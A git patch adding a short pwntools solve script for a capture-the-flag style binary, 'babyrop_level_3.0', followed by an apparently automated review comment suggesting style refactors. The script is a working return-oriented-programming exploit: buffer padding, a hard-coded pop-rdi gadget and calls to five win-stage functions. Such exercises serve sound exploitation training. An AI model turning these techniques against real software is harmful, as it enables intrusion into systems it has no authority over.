From d047d4a1efc176ae7bfbc3a74eaba42c1cf2cd4d Mon Sep 17 00:00:00 2001
From: jc
Date: Wed, 6 Aug 2025 15:15:18 +0300
Subject: [PATCH] solve script

---
 weiss_overlude/babyrop_level_3.0/a.py | 32 +++++++++++++++++++++++++++
 1 file changed, 32 insertions(+)
 create mode 100644 weiss_overlude/babyrop_level_3.0/a.py

diff --git a/weiss_overlude/babyrop_level_3.0/a.py b/weiss_overlude/babyrop_level_3.0/a.py
new file mode 100644
index 0000000..6cb5b63
--- /dev/null
+++ b/weiss_overlude/babyrop_level_3.0/a.py
@@ -0,0 +1,32 @@
+#!/usr/bin/python3
+
+from pwn import *
+
+"""
+patchelf --replace-needed libcapstone.so.5 /usr/lib/x86_64-linux-gnu/libcapstone.so.4 babyrop_level_3_0
+"""
+
+context.binary = target = ELF("./babyrop_level_3_0", checksec=False)
+r = process()
+
+# funcs
+s = lambda a: r.sendline(a)
+
+# gadgets
+pop_rdi = lambda a: p64(0x402c63) + p64(a)
+
+# buf
+buf = b"A"*72
+buf += pop_rdi(1)
+buf += p64(target.sym.win_stage_1)
+buf += pop_rdi(2)
+buf += p64(target.sym.win_stage_2)
+buf += pop_rdi(3)
+buf += p64(target.sym.win_stage_3)
+buf += pop_rdi(4)
+buf += p64(target.sym.win_stage_4)
+buf += pop_rdi(5)
+buf += p64(target.sym.win_stage_5)
+s(buf)
+
+r.interactive()
\ No newline at end of file
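Review bot: The constant `0x402c63` in the `pop_rdi` lambda is a bare magic number whose meaning is carried only by the lambda's name, so a reader cannot tell from the file what it is or when it goes stale; a comment such as `# address of the gadget in ./babyrop_level_3_0 (presumably a pop rdi; ret, judging from the name) — re-verify after any rebuild of the binary` would make that explicit. The five `buf += pop_rdi(i)` / `buf += p64(target.sym.win_stage_i)` pairs differ only in the stage number and read more clearly as `for stage in range(1, 6): buf += pop_rdi(stage) + p64(target.sym[f"win_stage_{stage}"])`. The `patchelf` note after the import is a bare string-literal expression rather than a module docstring (it follows `from pwn import *`) and is a no-op at runtime; a `#` comment block is the conventional form for a setup note in that position. The whole file is a flat script with no function scope, so these are style points on the module body itself.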